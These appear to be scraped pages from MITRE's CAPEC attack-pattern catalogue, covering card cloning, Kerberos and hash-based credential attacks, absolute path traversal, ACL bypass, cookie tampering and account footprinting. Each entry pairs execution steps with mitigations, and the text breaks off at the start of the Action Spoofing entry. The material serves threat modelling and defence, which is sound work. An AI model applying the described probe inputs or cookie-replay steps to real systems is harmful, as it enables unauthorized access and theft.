An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls) > 398 (Magnetic Strip Card Brute Force Attacks)

An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls) > 399 (Cloning RFID Cards or Chips)

An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls) > 400 (RFID Chip Deactivation or Destruction)

An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls) > 626 (Smudge Attack)

Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 507 (Physical Theft)

An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials)

An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 555 (Remote Services with Stolen Credentials)

This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 600 (Credential Stuffing)

An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 652 (Use of Known Kerberos Credentials)

An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 652 (Use of Known Kerberos Credentials) > 509 (Kerberoasting)

Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 652 (Use of Known Kerberos Credentials) > 645 (Use of Captured Tickets (Pass The Ticket))

An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 653 (Use of Known Operating System Credentials)

An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 653 (Use of Known Operating System Credentials) > 561 (Windows Admin Shares with Stolen Credentials)

An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 560 (Use of Known Domain Credentials) > 653 (Use of Known Operating System Credentials) > 644 (Use of Captured Hashes (Pass The Hash))

An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.

View Metrics

	CAPECs in this view		Total CAPECs
Attack Patterns	559	out of	559
Categories	9	out of	21
Views	0	out of	13
Total	568	out of	593

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated View_Objective
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Relationships, View_Objective

View Components

A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z

CAPEC-597: Absolute Path Traversal

Attack Pattern ID: 597

Abstraction: Detailed

View customized information:

Description

Relationships

This table shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf and ParentOf, and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore.

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	126	Path Traversal

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

Techniques
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
Induce errors to find informative error messages

Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

Techniques
Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.

Experiment

Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.

Techniques
Access common files in root directories such as "/bin", "/boot", "/lib", or "/home"
Access a specific drive letter or windows volume letter by specifying "C:dirname" for example
Access a known Windows UNC share by specifying "\\UNC\share\name" for example

Exploit

Access, modify, or execute arbitrary files.: An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.
Techniques
Manipulate file and its path by injecting absolute path sequences (e.g. "/home/file.txt").
Download files, modify files, or try to execute shell commands (with binary files).

Prerequisites

The target must leverage and access an underlying file system.

Skills Required

[Level: Low]

Simple command line attacks.

[Level: Medium]

Programming attacks.

Resources Required

The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results.

Consequences

This table specifies different individual consequences associated with the attack pattern. The Scope identifies the security property that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in their attack. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a pattern will be used to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Scope	Impact	Likelihood
Integrity Confidentiality Availability	Execute Unauthorized Commands
Integrity	Modify Data
Confidentiality	Read Data
Availability	Unreliable Execution

Mitigations

Design: Configure the access control correctly.

Design: Enforce principle of least privilege.

Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.

Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.

Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.

Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.

Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.

Implementation: Perform input validation for all remote content, including remote and user-generated content.

Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.

Implementation: Use indirect references rather than actual file names.

Implementation: Use possible permissions on file access when developing and deploying web applications.

Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach.

Related Weaknesses

A Related Weakness relationship associates a weakness with this attack pattern. Each association implies a weakness that must exist for a given attack to be successful. If multiple weaknesses are associated with the attack pattern, then any of the weaknesses (but not necessarily all) may be present for the attack to be successful. Each related weakness is identified by a CWE identifier.

CWE-ID	Weakness Name
36	Absolute Path Traversal

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-06 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2017-01-06 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC CATEGORY: Abuse Existing Functionality

Category ID: 210

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	113	Interface Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	131	Resource Leak Exposure
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	216	Communication Channel Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	227	Sustained Client Engagement
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	272	Protocol Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	554	Functionality Bypass

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
42	Abuse of Functionality

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Relationships
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Prerequisites, Description, Relationships, Resources_Required
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Relationships
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Relationships
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Abuse of Functionality

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

Attack Pattern ID: 1

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	122	Privilege Abuse
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	58	Restful Privilege Elevation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	679	Exploitation of Improperly Configured or Implemented Memory Protections
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	680	Exploitation of Improperly Controlled Registers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	681	Exploitation of Improperly Controlled Hardware Security Identifiers
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Survey: The attacker surveys the target application, possibly as a valid and authenticated user
Techniques
Spidering web sites for all available links
Brute force guessing of resource names
Brute force guessing of user names / credentials
Brute force guessing of function names / actions

Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions

Techniques
Use the web inventory of all forms and inputs and apply attack data to those inputs.
Use a packet sniffer to capture and record network traffic
Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.

Experiment

Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.
Techniques
Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)

Prerequisites

The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.

The various resources, or individual URLs, must be somehow discoverable by the attacker

The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource.

Skills Required

[Level: Low]

In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as "NoAccess", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.

Having done so, any direct access to those protected Servlets will be prohibited by the web container.

In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.

Example Instances

Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a "Single front controller" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.

If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.

Related Weaknesses

CWE-ID	Weakness Name
276	Incorrect Default Permissions
285	Improper Authorization
434	Unrestricted Upload of File with Dangerous Type
693	Protection Mechanism Failure
732	Incorrect Permission Assignment for Critical Resource
1191	On-Chip Debug and Test Interface With Improper Access Control
1193	Power-On of Untrusted Execution Core Before Enabling Fabric Access Control
1220	Insufficient Granularity of Access Control
1297	Unprotected Confidential Information on Device is Accessible by OSAT Vendors
1311	Improper Translation of Security Attributes by Fabric Bridge
1314	Missing Write Protection for Parametric Data Values
1315	Improper Setting of Bus Controlling Capability in Fabric End-point
1318	Missing Support for Security Features in On-chip Fabrics or Buses
1320	Improper Protection for Outbound Error Messages and Alert Signals
1321	Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
1327	Binding to an Unrestricted IP Address

Taxonomy Mappings

CAPEC mappings to ATT&CK techniques leverage an inheritance model to streamline and minimize direct CAPEC/ATT&CK mappings. Inheritance of a mapping is indicated by text stating that the parent CAPEC has relevant ATT&CK mappings. Note that the ATT&CK Enterprise Framework does not use an inheritance model as part of the mapping to CAPEC.

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.010	Hijack Execution Flow: ServicesFile Permissions Weakness

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Pattern, References
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Pattern, Description Summary
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Skills_Required, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Weaknesses

CAPEC-31: Accessing/Intercepting/Modifying HTTP Cookies

Attack Pattern ID: 31

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	39	Manipulating Opaque Client-based Data Tokens
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	157	Sniffing Attacks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Collect and Analyze Information, Subvert Access Control

Execution Flow

Explore

Obtain copy of cookie: The adversary first needs to obtain a copy of the cookie. The adversary may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies.

Techniques
Sniff cookie using a network sniffer such as Wireshark
Obtain cookie using a utility such as the Firefox Cookie Manager, Chrome DevTools or AnEC Cookie Editor.
Steal cookie via a cross-site scripting attack.
Guess cookie contents if it contains predictable information.

Experiment

Obtain sensitive information from cookie: The adversary may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them.
Techniques
If cookie shows any signs of being encoded using a standard scheme such as base64, decode it.
Analyze the cookie's contents to determine whether it contains any sensitive information.

Modify cookie to subvert security controls.: The adversary may be able to modify or replace cookies to bypass security controls in the application.

Techniques
Modify logical parts of cookie and send it back to server to observe the effects.
Modify numeric parts of cookie arithmetically and send it back to server to observe the effects.
Modify cookie bitwise and send it back to server to observe the effects.
Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a "points balance" for a given user where the points have some value. The user may spend their points and then replace their cookie with an older one to restore their balance.

Prerequisites

Target server software must be a HTTP daemon that relies on cookies.

The cookies must contain sensitive information.

The adversary must be able to make HTTP requests to the server, and the cookie must be contained in the reply.

Skills Required

[Level: Low]

To overwrite session cookie data, and submit targeted attacks via HTTP

[Level: High]

Exploiting a remote buffer overflow generated by attack

Resources Required

A utility that allows for the viewing and modification of cookies. Many modern web browsers support this behavior.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Use input validation for cookies

Design: Generate and validate MAC for cookies

Implementation: Use SSL/TLS to protect cookie in transit

Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software.

Example Instances

There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the adversary in the middle attack (CAPEC-94) relies on a network sniffer, proxy, or other intermediary to intercept the subject's credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the adversary to accomplish if no other protection mechanisms are in place. See also: CVE-2010-5148 , CVE-2016-0353

Related Weaknesses

CWE-ID	Weakness Name
565	Reliance on Cookies without Validation and Integrity Checking
302	Authentication Bypass by Assumed-Immutable Data
311	Missing Encryption of Sensitive Data
113	Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
539	Use of Persistent Cookies Containing Sensitive Information
20	Improper Input Validation
315	Cleartext Storage of Sensitive Information in a Cookie
384	Session Fixation
472	External Control of Assumed-Immutable Web Parameter
602	Client-Side Enforcement of Server-Side Security
642	External Control of Critical State Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1539	Steal Web Session Cookie

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances, Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-575: Account Footprinting

Attack Pattern ID: 575

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1087	Account Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations

CAPEC-173: Action Spoofing

Attack Pattern ID: 173

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
